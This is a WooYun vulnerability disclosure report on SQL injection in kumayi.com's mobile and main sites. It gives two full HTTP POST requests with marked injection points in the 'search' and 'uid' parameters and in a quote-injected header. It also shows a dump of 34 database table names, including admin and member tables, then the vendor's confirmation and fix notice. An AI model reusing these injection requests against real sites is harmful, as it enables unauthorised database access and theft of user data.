乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-12: 细节已通知厂商并且等待厂商处理中 2016-01-12: 厂商已经确认,细节仅向厂商公开 2016-01-22: 细节向核心白帽子及相关领域专家公开 2016-02-01: 细节向普通白帽子公开 2016-02-11: 细节向实习白帽子公开 2016-02-22: 细节向公众公开
SQL SQL SQL 注入~
这次还包括移动站的问题#1:post注入点:参数:search
POST /index.php?s=/home/search/searchresult HTTP/1.1Host: m.kumayi.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0) Gecko/20100101 Firefox/43.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://m.kumayi.com/index.php?s=/home/search/searchresultCookie: PHPSESSID=f6asf9aqglj3qj4in2r51ro806; 3d3fae5ec5623f99b660d6069647577a=MjgzNA%3D%3D; 14c4b06b824ec593239362517f538b29=MTgzMjU2MjI1NjI%3D; CNZZDATA1255732784=1970221751-1452517252-http%253A%252F%252Fm.kumayi.com%252F%7C1452517252; 0f518e1608f240990835a3490e61c734=%2C%27X-Forwarded-For: 8.8.8.8'Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 8search=1*
#2:post注入参数:uid
POST /index.php?s=/Home/Index/personal HTTP/1.1Host: www.kumayi.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0) Gecko/20100101 Firefox/43.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.kumayi.com/index.php?s=/Home/Index/accountsetCookie: PHPSESSID=86tdgc15vuq8ff2snl8m1tpm43; CNZZDATA1255732784=1054442556-1452495201-http%253A%252F%252Fwww.kumayi.com%252F%7C1452517252; 3d3fae5ec5623f99b660d6069647577a=MjgzNA%3D%3D; 0f518e1608f240990835a3490e61c734=%2C138%2C%E6%80%92%E6%96%A9%E8%BD%A9%E8%BE%95%2C%E6%94%BE%E5%BC%80%E9%82%A3%E4%B8%89%E5%9B%BD%2C%E5%A5%B3%E7%A5%9E%E8%81%94%E7%9B%9F%2C%27%2C%E2%80%98%2C1X-Forwarded-For: 8.8.8.8'Connection: keep-aliveContent-Type: multipart/form-data; boundary=---------------------------13155976113642303642084312376Content-Length: 1021-----------------------------13155976113642303642084312376Content-Disposition: form-data; name="photo"; filename=""Content-Type: application/octet-stream-----------------------------13155976113642303642084312376Content-Disposition: form-data; name="username"183********-----------------------------13155976113642303642084312376Content-Disposition: form-data; name="year"0-----------------------------13155976113642303642084312376Content-Disposition: form-data; name="month"-1-----------------------------13155976113642303642084312376Content-Disposition: form-data; name="day"-1-----------------------------13155976113642303642084312376Content-Disposition: form-data; name="province"10-----------------------------13155976113642303642084312376Content-Disposition: form-data; name="city"1001-----------------------------13155976113642303642084312376Content-Disposition: form-data; name="uid"2834*-----------------------------13155976113642303642084312376--
Database: uc_mumayi[34 tables]+-------------------------+| cdb_uc_admins || cdb_uc_applications || cdb_uc_badwords || cdb_uc_domains || cdb_uc_failedlogins || cdb_uc_feeds || cdb_uc_friends || cdb_uc_jihuopass || cdb_uc_mailqueue || cdb_uc_memberfields || cdb_uc_members || cdb_uc_mergemembers || cdb_uc_newpm || cdb_uc_notelist || cdb_uc_pm_indexes || cdb_uc_pm_lists || cdb_uc_pm_members || cdb_uc_pm_messages_0 || cdb_uc_pm_messages_1 || cdb_uc_pm_messages_2 || cdb_uc_pm_messages_3 || cdb_uc_pm_messages_4 || cdb_uc_pm_messages_5 || cdb_uc_pm_messages_6 || cdb_uc_pm_messages_7 || cdb_uc_pm_messages_8 || cdb_uc_pm_messages_9 || cdb_uc_pms || cdb_uc_protectedmembers || cdb_uc_settings || cdb_uc_sqlcache || cdb_uc_tags || cdb_uc_vars || user4 |+-------------------------
更多证明同: WooYun: 木蚂蚁SQL注入影响多个站(涉及387万用户数据\以及酷蚂蚁)
蚂蚁兄弟,多来点rank可好?
危害等级:高
漏洞Rank:15
确认时间:2016-01-12 16:40
已修复,感谢作者的反馈!
暂无